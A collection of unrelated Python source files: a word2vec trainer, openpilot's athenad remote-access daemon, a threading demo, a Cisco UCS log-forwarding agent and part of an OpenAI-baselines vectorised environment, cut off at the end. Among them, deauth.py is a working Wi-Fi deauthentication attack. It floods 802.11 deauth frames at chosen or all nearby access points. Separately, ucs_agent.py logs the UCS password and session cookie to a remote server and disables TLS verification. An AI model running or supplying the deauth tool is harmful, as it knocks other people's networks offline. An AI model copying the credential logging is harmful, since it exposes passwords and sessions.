self._analogy_a = analogy_a
self._analogy_b = analogy_b
self._analogy_c = analogy_c
self._analogy_pred_idx = pred_idx
self._nearby_word = nearby_word
self._nearby_val = nearby_val
self._nearby_idx = nearby_idx
# Properly initialize all variables.
tf.global_variables_initializer().run()
self.saver = tf.train.Saver()
def _train_thread_body(self):
initial_epoch, = self._session.run([self._epoch])
while True:
_, epoch = self._session.run([self._train, self._epoch])
if epoch != initial_epoch:
break
def train(self):
"""Train the model."""
opts = self._options
initial_epoch, initial_words = self._session.run([self._epoch, self._words])
workers = []
for _ in xrange(opts.concurrent_steps):
t = threading.Thread(target=self._train_thread_body)
t.start()
workers.append(t)
last_words, last_time = initial_words, time.time()
while True:
time.sleep(5) # Reports our progress once a while.
(epoch, step, words, lr) = self._session.run(
[self._epoch, self.global_step, self._words, self._lr])
now = time.time()
last_words, last_time, rate = words, now, (words - last_words) / (
now - last_time)
print("Epoch %4d Step %8d: lr = %5.3f words/sec = %8.0f\r" % (epoch, step,
lr, rate),
end="")
sys.stdout.flush()
if epoch != initial_epoch:
break
for t in workers:
t.join()
def _predict(self, analogy):
"""Predict the top 4 answers for analogy questions."""
idx, = self._session.run([self._analogy_pred_idx], {
self._analogy_a: analogy[:, 0],
self._analogy_b: analogy[:, 1],
self._analogy_c: analogy[:, 2]
})
return idx
def eval(self):
"""Evaluate analogy questions and reports accuracy."""
# How many questions we get right at precision@1.
correct = 0
try:
total = self._analogy_questions.shape[0]
except AttributeError as e:
raise AttributeError("Need to read analogy questions.")
start = 0
while start < total:
limit = start + 2500
sub = self._analogy_questions[start:limit, :]
idx = self._predict(sub)
start = limit
for question in xrange(sub.shape[0]):
for j in xrange(4):
if idx[question, j] == sub[question, 3]:
# Bingo! We predicted correctly. E.g., [italy, rome, france, paris].
correct += 1
break
elif idx[question, j] in sub[question, :3]:
# We need to skip words already in the question.
continue
else:
# The correct label is not the precision@1
break
print()
print("Eval %4d/%d accuracy = %4.1f%%" % (correct, total,
correct * 100.0 / total))
def analogy(self, w0, w1, w2):
"""Predict word w3 as in w0:w1 vs w2:w3."""
wid = np.array([[self._word2id.get(w, 0) for w in [w0, w1, w2]]])
idx = self._predict(wid)
for c in [self._id2word[i] for i in idx[0, :]]:
if c not in [w0, w1, w2]:
print(c)
break
print("unknown")
def nearby(self, words, num=20):
"""Prints out nearby words given a list of words."""
ids = np.array([self._word2id.get(x, 0) for x in words])
vals, idx = self._session.run(
[self._nearby_val, self._nearby_idx], {self._nearby_word: ids})
for i in xrange(len(words)):
print("\n%s\n=====================================" % (words[i]))
for (neighbor, distance) in zip(idx[i, :num], vals[i, :num]):
print("%-20s %6.4f" % (self._id2word[neighbor], distance))
def _start_shell(local_ns=None):
# An interactive shell is useful for debugging/development.
import IPython
user_ns = {}
if local_ns:
user_ns.update(local_ns)
user_ns.update(globals())
IPython.start_ipython(argv=[], user_ns=user_ns)
def main(_):
"""Train a word2vec model."""
if not FLAGS.train_data or not FLAGS.eval_data or not FLAGS.save_path:
print("--train_data --eval_data and --save_path must be specified.")
sys.exit(1)
opts = Options()
with tf.Graph().as_default(), tf.Session() as session:
with tf.device("/cpu:0"):
model = Word2Vec(opts, session)
model.read_analogies() # Read analogy questions
for _ in xrange(opts.epochs_to_train):
model.train() # Process one epoch
model.eval() # Eval analogies.
# Perform a final save.
model.saver.save(session, os.path.join(opts.save_path, "model.ckpt"),
global_step=model.global_step)
if FLAGS.interactive:
# E.g.,
# [0]: model.analogy(b'france', b'paris', b'russia')
# [1]: model.nearby([b'proton', b'elephant', b'maxwell'])
_start_shell(locals())
if __name__ == "__main__":
tf.app.run()
|
athenad.py
|
#!/usr/bin/env python3
import base64
import hashlib
import io
import json
import os
import sys
import queue
import random
import select
import socket
import threading
import time
from collections import namedtuple
from functools import partial
from typing import Any
import requests
from jsonrpc import JSONRPCResponseManager, dispatcher
from websocket import ABNF, WebSocketTimeoutException, WebSocketException, create_connection
import cereal.messaging as messaging
from cereal.services import service_list
from common.api import Api
from common.basedir import PERSIST
from common.params import Params
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE, PC, TICI, JETSON
from selfdrive.loggerd.config import ROOT
from selfdrive.loggerd.xattr_cache import getxattr, setxattr
from selfdrive.swaglog import cloudlog, SWAGLOG_DIR
from selfdrive.version import get_version, get_git_remote, get_git_branch, get_git_commit
ATHENA_HOST = os.getenv('ATHENA_HOST', 'wss://athena.comma.ai')
HANDLER_THREADS = int(os.getenv('HANDLER_THREADS', "4"))
LOCAL_PORT_WHITELIST = set([8022])
LOG_ATTR_NAME = 'user.upload'
LOG_ATTR_VALUE_MAX_UNIX_TIME = int.to_bytes(2147483647, 4, sys.byteorder)
RECONNECT_TIMEOUT_S = 70
dispatcher["echo"] = lambda s: s
recv_queue: Any = queue.Queue()
send_queue: Any = queue.Queue()
upload_queue: Any = queue.Queue()
log_send_queue: Any = queue.Queue()
log_recv_queue: Any = queue.Queue()
cancelled_uploads: Any = set()
UploadItem = namedtuple('UploadItem', ['path', 'url', 'headers', 'created_at', 'id'])
def handle_long_poll(ws):
end_event = threading.Event()
threads = [
threading.Thread(target=ws_recv, args=(ws, end_event), name='ws_recv'),
threading.Thread(target=ws_send, args=(ws, end_event), name='wc_send'),
threading.Thread(target=upload_handler, args=(end_event,), name='upload_handler'),
threading.Thread(target=log_handler, args=(end_event,), name='log_handler'),
] + [
threading.Thread(target=jsonrpc_handler, args=(end_event,), name=f'worker_{x}')
for x in range(HANDLER_THREADS)
]
for thread in threads:
thread.start()
try:
while not end_event.is_set():
time.sleep(0.1)
except (KeyboardInterrupt, SystemExit):
end_event.set()
raise
finally:
for thread in threads:
cloudlog.debug(f"athena.joining {thread.name}")
thread.join()
def jsonrpc_handler(end_event):
dispatcher["startLocalProxy"] = partial(startLocalProxy, end_event)
while not end_event.is_set():
try:
data = recv_queue.get(timeout=1)
if "method" in data:
cloudlog.debug(f"athena.jsonrpc_handler.call_method {data}")
response = JSONRPCResponseManager.handle(data, dispatcher)
send_queue.put_nowait(response.json)
elif "id" in data and ("result" in data or "error" in data):
log_recv_queue.put_nowait(data)
else:
raise Exception("not a valid request or response")
except queue.Empty:
pass
except Exception as e:
cloudlog.exception("athena jsonrpc handler failed")
send_queue.put_nowait(json.dumps({"error": str(e)}))
def upload_handler(end_event):
while not end_event.is_set():
try:
item = upload_queue.get(timeout=1)
if item.id in cancelled_uploads:
cancelled_uploads.remove(item.id)
continue
_do_upload(item)
except queue.Empty:
pass
except Exception:
cloudlog.exception("athena.upload_handler.exception")
def _do_upload(upload_item):
with open(upload_item.path, "rb") as f:
size = os.fstat(f.fileno()).st_size
return requests.put(upload_item.url,
data=f,
headers={**upload_item.headers, 'Content-Length': str(size)},
timeout=10)
# security: user should be able to request any message from their car
@dispatcher.add_method
def getMessage(service=None, timeout=1000):
if service is None or service not in service_list:
raise Exception("invalid service")
socket = messaging.sub_sock(service, timeout=timeout)
ret = messaging.recv_one(socket)
if ret is None:
raise TimeoutError
return ret.to_dict()
@dispatcher.add_method
def getVersion():
return {
"version": get_version(),
"remote": get_git_remote(),
"branch": get_git_branch(),
"commit": get_git_commit(),
}
@dispatcher.add_method
def setNavDestination(latitude=0, longitude=0):
destination = {
"latitude": latitude,
"longitude": longitude,
}
Params().put("NavDestination", json.dumps(destination))
return {"success": 1}
@dispatcher.add_method
def listDataDirectory():
files = [os.path.relpath(os.path.join(dp, f), ROOT) for dp, dn, fn in os.walk(ROOT) for f in fn]
return files
@dispatcher.add_method
def reboot():
sock = messaging.sub_sock("deviceState", timeout=1000)
ret = messaging.recv_one(sock)
if ret is None or ret.deviceState.started:
raise Exception("Reboot unavailable")
def do_reboot():
time.sleep(2)
HARDWARE.reboot()
threading.Thread(target=do_reboot).start()
return {"success": 1}
@dispatcher.add_method
def uploadFileToUrl(fn, url, headers):
if len(fn) == 0 or fn[0] == '/' or '..' in fn:
return 500
path = os.path.join(ROOT, fn)
if not os.path.exists(path):
return 404
item = UploadItem(path=path, url=url, headers=headers, created_at=int(time.time() * 1000), id=None)
upload_id = hashlib.sha1(str(item).encode()).hexdigest()
item = item._replace(id=upload_id)
upload_queue.put_nowait(item)
return {"enqueued": 1, "item": item._asdict()}
@dispatcher.add_method
def listUploadQueue():
return [item._asdict() for item in list(upload_queue.queue)]
@dispatcher.add_method
def cancelUpload(upload_id):
upload_ids = set(item.id for item in list(upload_queue.queue))
if upload_id not in upload_ids:
return 404
cancelled_uploads.add(upload_id)
return {"success": 1}
def startLocalProxy(global_end_event, remote_ws_uri, local_port):
try:
if local_port not in LOCAL_PORT_WHITELIST:
raise Exception("Requested local port not whitelisted")
cloudlog.debug("athena.startLocalProxy.starting")
params = Params()
dongle_id = params.get("DongleId").decode('utf8')
identity_token = Api(dongle_id).get_token()
ws = create_connection(remote_ws_uri,
cookie="jwt=" + identity_token,
enable_multithread=True)
ssock, csock = socket.socketpair()
local_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
local_sock.connect(('127.0.0.1', local_port))
local_sock.setblocking(0)
proxy_end_event = threading.Event()
threads = [
threading.Thread(target=ws_proxy_recv, args=(ws, local_sock, ssock, proxy_end_event, global_end_event)),
threading.Thread(target=ws_proxy_send, args=(ws, local_sock, csock, proxy_end_event))
]
for thread in threads:
thread.start()
cloudlog.debug("athena.startLocalProxy.started")
return {"success": 1}
except Exception as e:
cloudlog.exception("athenad.startLocalProxy.exception")
raise e
@dispatcher.add_method
def getPublicKey():
if not os.path.isfile(PERSIST + '/comma/id_rsa.pub'):
return None
with open(PERSIST + '/comma/id_rsa.pub', 'r') as f:
return f.read()
@dispatcher.add_method
def getSshAuthorizedKeys():
return Params().get("GithubSshKeys", encoding='utf8') or ''
@dispatcher.add_method
def getSimInfo():
return HARDWARE.get_sim_info()
@dispatcher.add_method
def getNetworkType():
return HARDWARE.get_network_type()
@dispatcher.add_method
def takeSnapshot():
from selfdrive.camerad.snapshot.snapshot import snapshot, jpeg_write
ret = snapshot()
if ret is not None:
def b64jpeg(x):
if x is not None:
f = io.BytesIO()
jpeg_write(f, x)
return base64.b64encode(f.getvalue()).decode("utf-8")
else:
return None
return {'jpegBack': b64jpeg(ret[0]),
'jpegFront': b64jpeg(ret[1])}
else:
raise Exception("not available while camerad is started")
def get_logs_to_send_sorted():
# TODO: scan once then use inotify to detect file creation/deletion
curr_time = int(time.time())
logs = []
for log_entry in os.listdir(SWAGLOG_DIR):
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
time_sent = int.from_bytes(getxattr(log_path, LOG_ATTR_NAME), sys.byteorder)
except (ValueError, TypeError):
time_sent = 0
# assume send failed and we lost the response if sent more than one hour ago
if not time_sent or curr_time - time_sent > 3600:
logs.append(log_entry)
# return logs in order they should be sent
# excluding most recent (active) log file
return sorted(logs[:-1])
def log_handler(end_event):
if PC or JETSON:
return
log_files = []
last_scan = 0
while not end_event.is_set():
try:
curr_scan = sec_since_boot()
if curr_scan - last_scan > 10:
log_files = get_logs_to_send_sorted()
last_scan = curr_scan
# send one log
curr_log = None
if len(log_files) > 0:
log_entry = log_files.pop()
cloudlog.debug(f"athena.log_handler.forward_request {log_entry}")
try:
curr_time = int(time.time())
log_path = os.path.join(SWAGLOG_DIR, log_entry)
setxattr(log_path, LOG_ATTR_NAME, int.to_bytes(curr_time, 4, sys.byteorder))
with open(log_path, "r") as f:
jsonrpc = {
"method": "forwardLogs",
"params": {
"logs": f.read()
},
"jsonrpc": "2.0",
"id": log_entry
}
log_send_queue.put_nowait(json.dumps(jsonrpc))
curr_log = log_entry
except OSError:
pass # file could be deleted by log rotation
# wait for response up to ~100 seconds
# always read queue at least once to process any old responses that arrive
for _ in range(100):
if end_event.is_set():
break
try:
log_resp = json.loads(log_recv_queue.get(timeout=1))
log_entry = log_resp.get("id")
log_success = "result" in log_resp and log_resp["result"].get("success")
cloudlog.debug(f"athena.log_handler.forward_response {log_entry} {log_success}")
if log_entry and log_success:
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
setxattr(log_path, LOG_ATTR_NAME, LOG_ATTR_VALUE_MAX_UNIX_TIME)
except OSError:
pass # file could be deleted by log rotation
if curr_log == log_entry:
break
except queue.Empty:
if curr_log is None:
break
except Exception:
cloudlog.exception("athena.log_handler.exception")
def ws_proxy_recv(ws, local_sock, ssock, end_event, global_end_event):
while not (end_event.is_set() or global_end_event.is_set()):
try:
data = ws.recv()
local_sock.sendall(data)
except WebSocketTimeoutException:
pass
except Exception:
cloudlog.exception("athenad.ws_proxy_recv.exception")
break
cloudlog.debug("athena.ws_proxy_recv closing sockets")
ssock.close()
local_sock.close()
cloudlog.debug("athena.ws_proxy_recv done closing sockets")
end_event.set()
def ws_proxy_send(ws, local_sock, signal_sock, end_event):
while not end_event.is_set():
try:
r, _, _ = select.select((local_sock, signal_sock), (), ())
if r:
if r[0].fileno() == signal_sock.fileno():
# got end signal from ws_proxy_recv
end_event.set()
break
data = local_sock.recv(4096)
if not data:
# local_sock is dead
end_event.set()
break
ws.send(data, ABNF.OPCODE_BINARY)
except Exception:
cloudlog.exception("athenad.ws_proxy_send.exception")
end_event.set()
cloudlog.debug("athena.ws_proxy_send closing sockets")
signal_sock.close()
cloudlog.debug("athena.ws_proxy_send done closing sockets")
def ws_recv(ws, end_event):
last_ping = int(sec_since_boot() * 1e9)
while not end_event.is_set():
try:
opcode, data = ws.recv_data(control_frame=True)
if opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
if opcode == ABNF.OPCODE_TEXT:
data = data.decode("utf-8")
recv_queue.put_nowait(data)
elif opcode == ABNF.OPCODE_PING:
last_ping = int(sec_since_boot() * 1e9)
Params().put("LastAthenaPingTime", str(last_ping))
except WebSocketTimeoutException:
ns_since_last_ping = int(sec_since_boot() * 1e9) - last_ping
if ns_since_last_ping > RECONNECT_TIMEOUT_S * 1e9:
cloudlog.exception("athenad.wc_recv.timeout")
end_event.set()
except Exception:
cloudlog.exception("athenad.ws_recv.exception")
end_event.set()
def ws_send(ws, end_event):
while not end_event.is_set():
try:
try:
data = send_queue.get_nowait()
except queue.Empty:
data = log_send_queue.get(timeout=1)
ws.send(data)
except queue.Empty:
pass
except Exception:
cloudlog.exception("athenad.ws_send.exception")
end_event.set()
def backoff(retries):
return random.randrange(0, min(128, int(2 ** retries)))
def manage_tokens(api):
if not TICI:
return
try:
params = Params()
mapbox = api.get(f"/v1/tokens/mapbox/{api.dongle_id}/", timeout=5.0, access_token=api.get_token())
if mapbox.status_code == 200:
params.put("MapboxToken", mapbox.json()["token"])
else:
params.delete("MapboxToken")
except Exception:
cloudlog.exception("Failed to update tokens")
def main():
params = Params()
dongle_id = params.get("DongleId", encoding='utf-8')
ws_uri = ATHENA_HOST + "/ws/v2/" + dongle_id
api = Api(dongle_id)
conn_retries = 0
while 1:
try:
cloudlog.event("athenad.main.connecting_ws", ws_uri=ws_uri)
ws = create_connection(ws_uri,
cookie="jwt=" + api.get_token(),
enable_multithread=True,
timeout=1.0)
ws.settimeout(1)
cloudlog.event("athenad.main.connected_ws", ws_uri=ws_uri)
manage_tokens(api)
conn_retries = 0
handle_long_poll(ws)
except (KeyboardInterrupt, SystemExit):
break
except (ConnectionError, TimeoutError, WebSocketException):
conn_retries += 1
params.delete("LastAthenaPingTime")
except Exception:
cloudlog.exception("athenad.main.exception")
conn_retries += 1
params.delete("LastAthenaPingTime")
time.sleep(backoff(conn_retries))
if __name__ == "__main__":
main()
|
deauth.py
|
import logging
import sys
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import socket
from subprocess import call
from threading import Thread
from time import sleep
import printings
# local imports
from scan import WifiScan
conf.verb = 0
RED = "\033[1;31m"
GREEN = "\033[1;32m"
YELLOW = "\033[1;93m"
T_YELLOW = "\033[0;93m"
NORMAL = "\033[0;0m"
class Deauth(object):
def __init__(self, APs, interface):
self.APs = APs
self.interface = interface
self.BROADCAST = "FF:FF:FF:FF:FF:FF"
self.burst = 32
def start_deauth(self):
conf.iface = self.interface
if 3 <= len(self.APs) < 5:
self.burst = 10
if len(self.APs) >= 7:
self.burst = 3
while True:
for bssid in self.APs:
packet = Dot11(addr1=self.BROADCAST, addr2=bssid, addr3=bssid) / Dot11Deauth()
channel = self.APs[bssid]
call("sudo iwconfig {iface} channel {ch}".format(iface=self.interface, ch=channel), shell=True)
try:
send(packet, count=self.burst)
except socket.error:
print("{R}ERROR: Network-Interface is down.{N}".format(R=RED, N=NORMAL))
sys.exit(0)
print("[{G}+{N}] {pkt} frames sent to {Y}{bssid}{N}".format(pkt=self.burst, G=GREEN, N=NORMAL, Y=YELLOW, bssid=bssid.upper()))
sleep(1)
class DeauthAll(object):
def __init__(self, interface):
self.interface = interface
self.burst = 32
self.BROADCAST = "FF:FF:FF:FF:FF:FF"
self.deauth_active = False
def start_deauth_all(self):
def scan():
call("sudo clear", shell=True)
print("[{Y}*{N}] Scanning for new Access-Points... (8 sec.)".format(Y=YELLOW, N=NORMAL))
self.deauth_active = False
wifiscan.channelhop_active = True
wifiscan.do_scan()
wifiscan.channelhop_active = False
self.APs = wifiscan.get_access_points()
if len(self.APs) < 1:
print("\n{R}No Access-Points found. :({N}\n".format(R=RED, N=NORMAL))
thread.interrupt_main()
printings.deauth_all()
for bssid in self.APs:
print(" {G}->{N} {bssid} | {Y}{essid}{N}".format(G=GREEN, Y=T_YELLOW, N=NORMAL, bssid=bssid, essid=self.APs[bssid]["essid"]))
self.deauth_active = True
sleep(120)
scan()
conf.iface = self.interface
wifiscan = WifiScan(self.interface)
wifiscan.do_output = False
wifiscan.timeout = 8
hopT = Thread(target=wifiscan.channelhop, args=[])
hopT.daemon = True
hopT.start()
scanT = Thread(target=scan, args=[])
scanT.daemon = True
scanT.start()
while True:
if self.deauth_active:
if 1 < len(self.APs) < 5:
self.burst = 10
elif 5 < len(self.APs):
self.burst = 3
for bssid in self.APs:
packet = Dot11(addr1=self.BROADCAST, addr2=bssid, addr3=bssid) / Dot11Deauth()
send(packet, count=self.burst)
sleep(1)
|
tasks1.py
|
import time
import threading
def countdown(count):
while(count>=0):
print("'{0}' count down -> {1}".format(threading.current_thread().name, count))
count -= 1
time.sleep(3)
def countup():
count=0
while(count<=10):
print("'{0}' count up -> {1}".format(threading.current_thread().name, count))
count += 1
time.sleep(5)
print(threading.__file__)
th1 = threading.Thread(target=countdown, args=(10,), name='thread1')
th2 = threading.Thread(target=countup, args=(), name='thread2')
th1.start()
th2.start()
#countdown(10)
print("All done!")
|
ucs_agent.py
|
# -*- coding: utf-8 -*-
# Copyright 2017 Cisco Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
import pycurl
import re
import threading
from time import sleep
import argparse
import xmltodict
from ucsmsdk import ucsgenutils
from ucsmsdk import ucsmethodfactory
from ucsmsdk.ucshandle import UcsHandle
from ucsmsdk.ucsmethod import ExternalMethod
from ucsmsdk.ucsmo import ManagedObject
from zeus import client
import config as conf
class UCSAgent(object):
def __init__(self):
super(UCSAgent, self).__init__()
self.url = ''
self.user = ''
self.passwd = ''
self.cookie = ''
self.zeus_client = None
self.zeus_server = ''
self.token = ''
self.listener = None
self.event_string = ''
self.class_ids = []
self.fault = ["faultInst"]
self.performance = ["swSystemStats",
"etherTxStats",
"etherPauseStats",
"etherRxStats",
"etherErrStats",
"adaptorVnicStats",
"equipmentPsuStats",
"processorEnvStats",
"computeMbTempStats",
"computeMbPowerStats",
"equipmentChassisStats"]
self.inventory = ["firmwareRunning",
"storageLocalDisk",
"vnicEtherIf",
"lsServer",
"fabricVsan",
"fabricVlan",
"fabricEthLanPcEp",
"fabricEthLanPc",
"etherPIo",
"fabricDceSwSrvEp",
"computeBlade",
"equipmentPsu",
"equipmentChassis",
"equipmentSwitchCard",
"equipmentIOCard",
"topSystem",
"computeRackUnit"]
self.class_ids.extend(self.fault)
self.class_ids.extend(self.performance)
self.class_ids.extend(self.inventory)
self.count = 0
self.len = 0
def get_args(self):
# read arguments from command line parameters
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--ucs", nargs="?", type=str, default=conf.UCS,
help="""IP or host name of unified computing system managed server.
\n(default: %s)""" % conf.UCS)
parser.add_argument("-C", "--Count", nargs="?", type=str,
default=conf.COUNT,
help="Count of records in one log list. \n(default: %s)" % conf.COUNT)
parser.add_argument("-u", "--user", nargs="?", type=str,
default=conf.UCS_USER,
help="User name of UCS. \n(default: %s)" % conf.UCS_USER)
parser.add_argument("-p", "--password", nargs="?", type=str,
default=conf.UCS_PASSWD,
help="Password of UCS \n(default: %s)" % conf.UCS_PASSWD)
parser.add_argument("-s", "--secure", nargs="?", type=bool,
default=conf.IS_SECURE,
help="Secure of connection. \n(default: %s)" % conf.IS_SECURE)
parser.add_argument("-P", "--port", nargs="?", type=int,
default=conf.PORT,
help="Port of TCP socket. \n(default: %d)" % conf.PORT)
parser.add_argument("-l", "--log_level", nargs="?", type=str,
default=conf.LOG_LEVEL,
help="Level of log: CRITICAL, ERROR, WARN, WARNING,"
"INFO, DEBUG, NOTSET \n(default: %s)" % conf.LOG_LEVEL)
parser.add_argument("-t", "--token", nargs="?", type=str,
default=conf.ZEUS_TOKEN,
help="Token of ZEUS API.")
parser.add_argument("-z", "--zeus", nargs="?", type=str,
default=conf.ZEUS_SERVER,
help="""IP or host name of ZEUS server.
\n(default: %s)""" % conf.ZEUS_SERVER)
args = parser.parse_args()
return args
def check_level(self, loglevel):
level = getattr(logging, loglevel.upper(), None)
if not isinstance(level, int):
raise ValueError('Invalid log level: %s' % loglevel)
return level
def set_log_level(self, loglevel):
level = self.check_level(loglevel)
logging.basicConfig(format='%(asctime)s %(levelname)s: %(message)s',
level=level)
self.logger = logging.getLogger("USC-Agent")
def submit(self, msg, name="ucs"):
# check name: All log names must have only letter and numbers
if re.match('^[A-Za-z0-9]+$', name):
# send log to zeus.
return self.zeus_client.sendLog(name, msg)
else:
self.logger.error("""Name error: %s.
All log names must have only letter
and numbers (A-Za-z0-9).""" % name)
return None
def add_log(self, loglevel, name, msg, *args):
level = self.check_level(loglevel)
if self.logger.isEnabledFor(level):
self.logger._log(level, msg, args)
# submit data to zeus
return self.submit(msg, name)
def to_json(self, dn):
# return the json dict
dict = {'class_id': dn._class_id}
if isinstance(dn, ExternalMethod):
for prop, prop_value in sorted(ucsgenutils.iteritems(dn.__dict__)):
filter = ManagedObject.__dict__['_ManagedObject__internal_prop']
if prop in filter or prop.startswith("_ManagedObject__"):
continue
if "ExternalMethod" in prop:
continue
else:
dict[prop] = prop_value
return dict
if isinstance(dn, ManagedObject):
for prop, prop_value in sorted(ucsgenutils.iteritems(dn.__dict__)):
filter = ManagedObject.__dict__['_ManagedObject__internal_prop']
if prop in filter or prop.startswith("_ManagedObject__"):
continue
if prop in dn.__dict__['_ManagedObject__xtra_props']:
prop = "[X]" + str(prop)
dict[prop] = prop_value
else:
dict[prop] = prop_value
return dict
def get_dn_conf(self):
log_list = []
for class_id in self.class_ids:
xml_req = ucsmethodfactory.config_find_dns_by_class_id(
self.handler.cookie, class_id, in_filter=None)
self.dn_obj_list = self.handler.process_xml_elem(xml_req)
for dn in self.dn_obj_list:
dn_config = self.handler.query_dn(dn.value)
log_list.append(self.to_json(dn_config))
# use the self.to_json temporary until ucsmsdk provides this method.
self.len = len(log_list)
if self.len >= self.args.Count:
self.add_log("DEBUG", "ucs", log_list)
log_list = []
self.count += self.len
self.logger.info("%s configuration records sent." % self.count)
if self.len:
self.add_log("DEBUG", "ucs", log_list)
self.count += self.len
self.logger.info("%s configuration records sent." % self.count)
def submit_async_events(self, response):
self.event_string += response
while len(self.event_string) > 0:
str_list = self.event_string.split("\n", 1)
length = int(str_list[0])
event_str = str_list[1]
if len(event_str) >= length:
event = event_str[:length]
# convert xml str to json and send to zeus.
self.add_log("DEBUG", "ucs", json.dumps(xmltodict.parse(event)))
# new event string starts from the end of last event.
self.event_string = event_str[length:]
else:
# wait for entire content.
break
def subscribe_events(self):
self.listener = pycurl.Curl()
post_data = """<eventSubscribe cookie="%s"/>""" % self.cookie
self.listener.setopt(self.listener.POSTFIELDS, post_data)
self.listener.setopt(self.listener.URL, self.url)
self.listener.setopt(self.listener.WRITEFUNCTION,
self.submit_async_events)
self.listener.setopt(pycurl.SSL_VERIFYPEER, 0)
self.listener.setopt(pycurl.SSL_VERIFYHOST, 0)
self.listener.perform()
def unsubscribe_events(self):
xml_req = ucsmethodfactory.event_unsubscribe(self.handler.cookie)
res = self.handler.process_xml_elem(xml_req)
self.add_log("DEBUG", "ucs", msg=self.to_json(res))
self.logger.info("Unsubscribe events of UCSM.")
def event_loop(self):
# Maintain a client to listen to UCS's async notification.
# when receive events, sent them to zeus.
try:
self.sub_thread = threading.Thread(target=self.subscribe_events)
self.sub_thread.setDaemon(True)
self.sub_thread.start()
while threading.activeCount() > 0:
sleep(1)
except KeyboardInterrupt:
self.logger.info("KeyboardInterrupt")
finally:
self.unsubscribe_events()
def set_up(self):
# get arguments
self.args = self.get_args()
# set log level
self.set_log_level(self.args.log_level)
self.host = self.args.ucs
if self.args.secure == True:
self.url = 'https://%s/nuova' % self.args.ucs
else:
self.url = 'http://%s/nuova' % self.args.ucs
self.user = self.args.user
self.passwd = self.args.password
self.token = self.args.token
self.zeus_server = self.args.zeus
# set up a Zeus client to submit log to Zeus.
self.logger.info("Initiating Zeus connection...")
self.zeus_client = client.ZeusClient(self.token, self.zeus_server)
# set up a http client to UCS server.
self.logger.info("Initiating UCSM connection...")
self.handler = UcsHandle(self.host, self.user, self.passwd,
port=self.args.port, secure=self.args.secure)
# login to ucs
self.handler.login(auto_refresh=True)
self.add_log("DEBUG", "ucs",
msg={"User": self.user, "Password": self.passwd,
"cookie": self.handler.cookie})
self.logger.info("Login UCSM completed.")
self.logger.info("Getting configuration data...")
self.get_dn_conf()
self.logger.info("Listening to UCSM events...")
self.event_loop()
def close(self):
self.handler.logout()
self.add_log('DEBUG', "ucs",
msg={"User": self.user, "Password": self.passwd,
"cookie": self.handler.cookie})
self.logger.info("UCSM connection is ended.")
if __name__ == "__main__":
ucs_plugin = UCSAgent()
ucs_plugin.set_up()
ucs_plugin.close()
|
multiprocessing_env.py
|
# Code is from OpenAI baseline.
#https://github.com/openai/baselines/tree/master/baselines/common/vec_env
import numpy as np
from multiprocessing import Process, Pipe
import numpy as np
class RunningMeanStd(object):
# https://en.wikipedia.org/wiki/Algorithms_for_calculating_variance#Parallel_algorithm
def __init__(self, epsilon=1e-4, shape=()):
self.mean = np.zeros(shape, 'float64')
self.var = np.ones(shape, 'float64')
self.count = epsilon
def update(self, x):
batch_mean = np.mean(x, axis=0)
batch_var = np.var(x, axis=0)
batch_count = x.shape[0]
self.update_from_moments(batch_mean, batch_var, batch_count)
def update_from_moments(self, batch_mean, batch_var, batch_count):
delta = batch_mean - self.mean
tot_count = self.count + batch_count
new_mean = self.mean + delta * batch_count / tot_count
m_a = self.var * (self.count)
m_b = batch_var * (batch_count)
M2 = m_a + m_b + np.square(delta) * self.count * batch_count / (self.count + batch_count)
new_var = M2 / (self.count + batch_count)
new_count = batch_count + self.count
self.mean = new_mean
self.var = new_var
self.count = new_count
def worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x()
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'reset_task':
ob = env.reset_task()
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
else:
raise NotImplementedError
class VecEnv(object):
"""
An abstract asynchronous, vectorized environment.
"""
def __init__(self, num_envs, observation_space, action_space):
self.num_envs = num_envs
self.observation_space = observation_space
self.action_space = action_space
def reset(self):
"""
Reset all the environments and return an array of
observations, or a tuple of observation arrays.
If step_async is still doing work, that work will
be cancelled and step_wait() should not be called
until step_async() is invoked again.
"""
pass
def step_async(self, actions):
"""
Tell all the environments to start taking a step
with the given actions.
Call step_wait() to get the results of the step.
You should not call this if a step_async run is
already pending.
"""
pass
def step_wait(self):
"""
Wait for the step taken with step_async().
Returns (obs, rews, dones, infos):
- obs: an array of observations, or a tuple of
arrays of observations.
- rews: an array of rewards
- dones: an array of "episode done" booleans
- infos: a sequence of info objects
"""
pass
def close(self):
"""
Clean up the environments' resources.
"""
pass
def step(self, actions):
self.step_async(actions)
return self.step_wait()
class VecEnvWrapper(VecEnv):
def __init__(self, venv, observation_space=None, action_space=None):
self.venv = venv
VecEnv.__init__(self,
num_envs=venv.num_envs,
observation_space=observation_space or venv.observation_space,
action_space=action_space or venv.action_space)
def step_async(self, actions):
self.venv.step_async(actions)
def reset(self):
pass
def step_wait(self):
pass
def close(self):
return self.venv.close()
def render(self):
self.venv.render()
class CloudpickleWrapper(object):
"""
Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
"""
def __init__(self, x):
self.x = x
def __getstate__(self):
import cloudpickle
return cloudpickle.dumps(self.x)
def __setstate__(self, ob):
import pickle
self.x = pickle.loads(ob)
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns, spaces=None):
"""
envs: list of gym environments to run in subprocesses
"""
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.nenvs = nenvs
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
